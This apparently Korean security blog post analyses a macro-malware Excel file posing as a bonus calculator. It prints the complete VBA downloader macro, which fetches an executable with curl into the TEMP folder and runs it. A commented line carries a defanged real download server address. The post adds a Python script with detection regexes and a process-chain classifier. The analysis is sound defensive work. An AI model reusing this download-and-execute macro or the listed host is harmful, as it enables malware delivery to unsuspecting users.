꿈을꾸는 파랑새

Today we'll look at 상여금처리산식.xls, a piece of macro malware disguised as an Excel spreadsheet for calculating bonuses.
A bonus (상여금, 賞與金) is pay given in addition to regularly paid wages, where "regularly paid wages" means pay disbursed on a fixed, recurring schedule such as daily, weekly or monthly. This malware poses as a helper for calculating such bonuses. Its hash values are as follows:
File name: 상여금처리산식.xls
Size: 44.5 KB
CRC32: 9c36c9ef
MD5: 8452e1ad98dc9d446e3ce39214777a96
SHA-1: fb822f69195dff9b9127c977560a9234fdcb2c04
SHA-256: b3888bd2d679a9188b526dcae775e5834e726170c8d8356979a565697015c796
SHA-512: 27416c35631d7ce94187f87f9c4d7befc24cfb1890047fe76977cc8ad6147bf19607d277f5a66e93c01c041651257606e64e353f634c486e55e1c34678af1f10
Because this is macro malware, opening the file shows the usual security warning that macros have been disabled.

Opening the 상여금처리산식 malware (screenshot)

If the victim then enables macros, the macro runs and downloads the actual payload. Fortunately the VBA project was not password-protected, so the macro could be read directly. It is as follows:

The 상여금처리산식 macro (screenshot)

Private Const HKEY_CURRENT_USER = &H80000001
Private Const HKEY_LOCAL_MACHINE = &H80000002
Private Const REG_SZ = 1
' Registry API declarations; none of them is actually called anywhere in this macro
Private Declare PtrSafe Function RegSetValueEx Lib "advapi32" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long
Private Declare PtrSafe Function RegCreateKey Lib "advapi32.dll" Alias "RegCreateKeyA" (ByVal hKey As Long, ByVal lpSubKey As String, phkResult As Long) As Long
Private Declare PtrSafe Function RegCloseKey Lib "advapi32.dll" (ByVal hKey As Long) As Long
Function fileDownload()
    Dim exeUrl As String
    Dim cmdRun As String
    Dim defDir As String
    ' The download URL is stored in cell A10001 of Sheet1, far away from anything the victim would look at
    exeUrl = Worksheets("Sheet1").Cells(10001, 1).Value
    ' Escape '&' for cmd.exe so query-string parameters are not treated as command separators
    exeUrl = Replace(exeUrl, "&", "^&")
    defDir = Environ("TEMP") + "\fileDownloader.exe"
    cmdRun = "cmd.exe /c curl " + exeUrl + " --output " + defDir
    Dim fso: Set fso = CreateObject("Scripting.FileSystemObject")
    Dim counts As Integer
    counts = 0
    'DirFile = "C:\temp\fileDownloader.exe"
    If fso.FileExists(defDir) Then
    Else
        'Shell "cmd.exe /c curl http://106.249.253(.)146:12582/common/malDownFilePath.do?trnKey=20200122nleSLHhG^&type=fileDownload^&trnType=EML^&statType=XLS_RAN_EXEC --output C:\temp\filedownload.exe", vbNormalNoFocus
        Shell cmdRun, vbNormalNoFocus
    End If
   
    ' DirFile is never assigned (its assignment above is commented out), so FileExists("") is always False
    ' and this loop simply waits about five seconds before the payload is launched
    Do
        If fso.FileExists(DirFile) Then
            Application.Wait (Now + TimeValue("0:00:01"))
            Exit Do
        Else
            If counts < 5 Then
                Application.Wait (Now + TimeValue("0:00:01"))
                counts = counts + 1
            Else
                Exit Do
            End If
        End If
    Loop
        
     Shell "cmd.exe /c " + defDir, vbNormalNoFocus
   
End Function

Malware of this kind is usually named something like 상여금계산기 (bonus calculator) or 상여금 지급내역 계산 (bonus payment breakdown), so the name 상여금처리산식 (bonus processing formula) does feel rather North Korean in style. In any case, the malware behaves as follows. First it builds and runs the download command, with the URL taken from the worksheet cell (which here is just aa):
cmd.exe /c curl aa --output C:\Users\admin\AppData\Local\Temp\fileDownloader.exe
This saves the downloaded payload as fileDownloader.exe, and then it launches that file:
cmd.exe /c C:\Users\admin\AppData\Local\Temp\fileDownloader.exe
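As an added example (not code from this post or from the malware author), the following Python script models what the macro does with the cell value and how a defender could recognise both the macro and the resulting process chain. It shows why the macro rewrites "&" as "^&" before handing the URL to cmd.exe, scans the macro text for the downloader pattern, and classifies process-creation events where Excel spawns cmd.exe. The sample URL, the TEMP path and the three process events are constructed test data, and the cmd.exe separator model ignores quoting.

```python
from __future__ import annotations
import re

# Constructed sample values (not taken from the real sample)
SAMPLE_CELL_URL = "http://example.invalid/d.do?k=1&type=fileDownload"
SAMPLE_TEMP_DIR = r"C:\Users\admin\AppData\Local\Temp"

# Excerpt of the macro as printed in this post, embedded as input for the scanner
MACRO_EXCERPT = r'''
    exeUrl = Worksheets("Sheet1").Cells(10001, 1).Value
    exeUrl = Replace(exeUrl, "&", "^&")
    defDir = Environ("TEMP") + "\fileDownloader.exe"
    cmdRun = "cmd.exe /c curl " + exeUrl + " --output " + defDir
    Shell cmdRun, vbNormalNoFocus
    Application.Wait (Now + TimeValue("0:00:01"))
    Shell "cmd.exe /c " + defDir, vbNormalNoFocus
'''


def build_download_cmd(cell_value: str, temp_dir: str) -> str:
    """Rebuild the command line exactly the way fileDownload() does."""
    url = cell_value.replace("&", "^&")
    return f"cmd.exe /c curl {url} --output {temp_dir}\\fileDownloader.exe"


def cmd_commands(cmdline: str) -> list[str]:
    """Split the text after 'cmd.exe /c' at unescaped '&' command separators.
    Simplified model of cmd.exe: '^' escapes the next character, quoting is ignored."""
    cmds, cur, i = [], [], 0
    while i < len(cmdline):
        ch = cmdline[i]
        if ch == "^" and i + 1 < len(cmdline):
            cur.append(cmdline[i + 1])
            i += 2
            continue
        if ch == "&":
            cmds.append("".join(cur).strip())
            cur = []
        else:
            cur.append(ch)
        i += 1
    cmds.append("".join(cur).strip())
    return [c for c in cmds if c]


# Static indicators for this downloader pattern in VBA source
INDICATORS = {
    "shell_call": re.compile(r"\bShell\b", re.I),
    "curl_download": re.compile(r"\bcurl\b.*--output", re.I),
    "temp_drop": re.compile(r'Environ\("TEMP"\)', re.I),
    "cell_sourced_url": re.compile(r"Worksheets\(.*\)\.Cells\(\s*\d{4,}\s*,", re.I),
    "cmd_caret_escape": re.compile(r'Replace\(.*"&",\s*"\^&"\)', re.I),
    "wait_loop": re.compile(r"Application\.Wait", re.I),
}


def macro_indicators(vba: str) -> set[str]:
    """Return the names of the indicators found in a VBA source text."""
    return {name for name, rx in INDICATORS.items() if rx.search(vba)}


# Constructed process-creation events (as a Sysmon Event ID 1 style log would show them)
SAMPLE_PROCESS_EVENTS = [
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c curl aa --output C:\Users\admin\AppData\Local\Temp\fileDownloader.exe"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c C:\Users\admin\AppData\Local\Temp\fileDownloader.exe"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /c dir"},
]

OFFICE_PARENTS = ("excel.exe", "winword.exe", "powerpnt.exe")


def classify_event(ev: dict) -> str | None:
    """Label a process-creation event; None means it does not match this chain."""
    parent = ev["parent"].lower().rsplit("\\", 1)[-1]
    if parent not in OFFICE_PARENTS:
        return None
    cl = ev["cmdline"].lower()
    if "curl" in cl and "--output" in cl:
        return "office_spawned_curl_download"
    if "\\appdata\\local\\temp\\" in cl and cl.rstrip().endswith(".exe"):
        return "office_spawned_exe_from_temp"
    return "office_spawned_cmd"


if __name__ == "__main__":
    cmd = build_download_cmd(SAMPLE_CELL_URL, SAMPLE_TEMP_DIR)
    print("built:", cmd)
    print("unescaped split:", cmd_commands(SAMPLE_CELL_URL + " --output x"))
    print("escaped split:  ", cmd_commands(SAMPLE_CELL_URL.replace("&", "^&") + " --output x"))
    print("macro indicators:", sorted(macro_indicators(MACRO_EXCERPT)))
    for ev in SAMPLE_PROCESS_EVENTS:
        print(classify_event(ev), "<-", ev["cmdline"])
```

The unescaped split shows the problem the macro author was solving: without the caret, cmd.exe would cut the URL at the first "&" and try to run "type=fileDownload ..." as a second command, so curl would never receive the full query string. For detection, the Excel-to-cmd.exe-to-curl chain with an --output path under %TEMP% is a far more stable signal than the file hash, which changes with every rebuild of the lure.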
The security vendors detecting this malware on VirusTotal as of 2022-11-04 17:37:59 UTC are as follows:
Ad-Aware:VB:Trojan.Valyria.5775
ALYac:VB:Trojan.Valyria.5775
Antiy-AVL:Trojan/Generic.ASMacro.1421A
Arcabit:VB:Trojan.Valyria.D168F
Avast:Script:SNH-gen [Trj]
AVG:Script:SNH-gen [Trj]
Avira (no cloud):HEUR/Macro.Downloader.MRAFI.Gen
BitDefender:VB:Trojan.Valyria.5775
Cynet:Malicious (score: 99)
Cyren:X97M/Agent.BEQ.gen!Eldorado
Elastic:Malicious (high Confidence)
Emsisoft:VB:Trojan.Valyria.5775 (B)
eScan:VB:Trojan.Valyria.5775
Fortinet:VBA/Agent.ECH!tr.dldr
GData:VB:Trojan.Valyria.5775
Google:Detected
Kaspersky:HEUR:Trojan.MSOffice.Stratos.gen
MAX:Malware (ai Score=88)
Microsoft:TrojanDownloader:O97M/Powdow.RVBT!MTB
NANO-Antivirus:Trojan.Ole2.Vbs-heuristic.druvzi
Sangfor Engine Zero:Trojan.Generic-Macro.Save.43501494
SentinelOne (Static ML):Static AI - Malicious OLE
Symantec:ISB.Downloader!gen456
TACHYON:Suspicious/X97M.XSR.Gen
Tencent:Heur.Macro.Generic.a.bdb8d815
Trellix (FireEye):VB:Trojan.Valyria.5775
VIPRE:VB:Trojan.Valyria.5775
Most vendors detect it, but ESET and AhnLab V3 do not, so after writing this post I will go ahead and report it to them.
Since macro malware in Excel files aimed at people doing bonus calculations is being distributed like this, please always keep your antivirus software up to date.
